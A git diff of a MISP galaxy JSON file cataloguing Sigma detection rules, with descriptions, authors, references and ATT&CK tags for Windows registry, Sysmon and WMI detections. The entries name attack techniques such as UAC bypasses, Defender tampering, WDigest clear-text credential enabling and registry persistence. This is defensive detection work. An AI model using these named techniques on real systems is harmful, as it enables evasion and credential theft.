"uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "value": "New RUN Key Pointing to Suspicious Folder" + }, + { + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate 
tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + ], + "filename": "registry_set_susp_service_installed.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", + "value": "Suspicious Service Installed" + }, + { + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_susp_user_shell_folders.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" + ] + }, + "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "value": "Modify User Shell Folders Startup Value" + }, + { + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_taskcache_entry.yml", + "level": "high", + "logsource.category": 
"registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://labs.f-secure.com/blog/scheduled-task-tampering/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "value": "Scheduled TaskCache Change by Uncommon Program" + }, + { + "description": "Detects persistence method using windows telemetry", + "meta": { + "author": "Lednyov Alexey, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_telemetry_persistence.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "value": "Registry Persistence Mechanism via Windows Telemetry" + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "meta": { + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "filename": "registry_set_terminal_server_suspicious.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "value": "RDP Sensitive Settings Changed to Zero" + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "meta": { + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "filename": "registry_set_terminal_server_tampering.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + 
"https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "value": "RDP Sensitive Settings Changed" + }, + { + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_timeproviders_dllname.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" + ] + }, + "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "value": "Set TimeProviders DllName" + }, + { + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + 
"Legitimate use" + ], + "filename": "registry_set_treatas_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "value": "COM Hijacking via TreatAs" + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "value": "UAC Bypass via Event Viewer - Registry Set" + }, + { + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "meta": { + "author": "Omer Yampel, Christian Burkard", + "creation_date": "2017/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", + "value": "UAC Bypass via Sdclt" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "value": "UAC Bypass Using Windows Media Player - Registry" + }, + { + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_vbs_payload_stored.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", + "value": "VBScript Payload Stored in Registry" + }, + { + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_wab_dllpath_reg_change.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "https://twitter.com/Hexacorn/status/991447379864932352", + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "value": "Execution DLL of Choice Using WAB.EXE" + }, + { + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_wdigest_enable_uselogoncredential.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "value": "Wdigest Enable 
UseLogonCredential" + }, + { + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "meta": { + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_windows_defender_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", + "value": "Disable Windows Defender Functionalities Via Registry Keys" + }, + { + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate use of the multi session functionality" + ], + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "value": "Winlogon AllowMultipleTSSessions Enable" + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_winlogon_notify_key.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "value": "Winlogon Notify Key Logon Persistence" + }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "regsitry_set_natural_language_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Add DLLPathOverride Entry For Persistence" + }, + { + "description": "Detects Accessing to lsass.exe by Powershell", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", + "value": "Accessing WinAPI in PowerShell for Credentials Dumping" + }, + { + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", + "value": "Sysmon Configuration Change" + }, + { + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + 
"meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_error.yml", + "level": "high", + "logsource.category": "sysmon_error", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "value": "Sysmon Configuration Error" + }, + { + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_status.yml", + "level": "high", + "logsource.category": "sysmon_status", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "value": "Sysmon Configuration Modification" + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "creation_date": 
"2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_dcom_iertutil_dll_hijack.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon" + }, + { + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "sysmon_file_block_exe.yml", + "level": "high", + "logsource.category": "file_block", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "value": "Sysmon Blocked Executable" + }, + { + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "creation_date": "2022/01/25", + "falsepositive": [ + "There are no known false positives at this time" + ], + "filename": "sysmon_process_hollowing.yml", + "level": "high", + "logsource.category": "process_tampering", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + 
"https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" + ] + }, + "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "value": "Sysmon Process Hollowing Detection" + }, + { + "description": "Detects creation of WMI event subscription persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "filename": "sysmon_wmi_event_subscription.yml", + "level": "medium", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "value": "WMI Event Subscription" + }, + { + "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", + "value": "Suspicious Encoded Scripts in a WMI Consumer" + }, + { + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "meta": { + 
"author": "Florian Roth, Jonhnathan Ribeiro", + "creation_date": "2019/04/15", + "falsepositive": [ + "Legitimate administrative scripts" + ], + "filename": "sysmon_wmi_susp_scripting.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "value": "Suspicious Scripting in a WMI Consumer" + } + ], + "version": 1 +} diff --git a/galaxies/sigma-rules.json b/galaxies/sigma-rules.json index 2733e81..f2334b9 100644 --- a/galaxies/sigma-rules.json +++ b/galaxies/sigma-rules.json @@ -6,4 +6,4 @@ "type": "sigma-rules", "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "version": 1 -} \ No newline at end of file +} From 187701bacb7eb2ecf57fae96a2df4a16385de6b3 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Fri, 6 Jan 2023 15:36:33 +0100 Subject: [PATCH 06/13] chg: [sigma] regenerated from the test script (also updated the script to ensure UUID consistency for the galaxy) --- clusters/sigma-rules.json | 116008 ++++++++++++++++++----------------- 1 file changed, 59124 insertions(+), 56884 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 39ca38c..ffc3f22 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json 
@@ -10,10255 +10,28 @@ "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "values": [ { - "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_exploiting.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", - "value": "Antivirus Exploitation Framework Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_hacktool.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", - "value": "Antivirus Hacktool Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a password dumper", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_password_dumper.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - 
"https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558", - "attack.t1003.001", - "attack.t1003.002" - ] - }, - "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", - "value": "Antivirus Password Dumper Detection" - }, - { - "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", - "meta": { - "author": "Sittikorn S, Nuttakorn T, Tim Shelton", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unlikely, or pending PSP analysis" - ], - "filename": "av_printernightmare_cve_2021_34527.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": 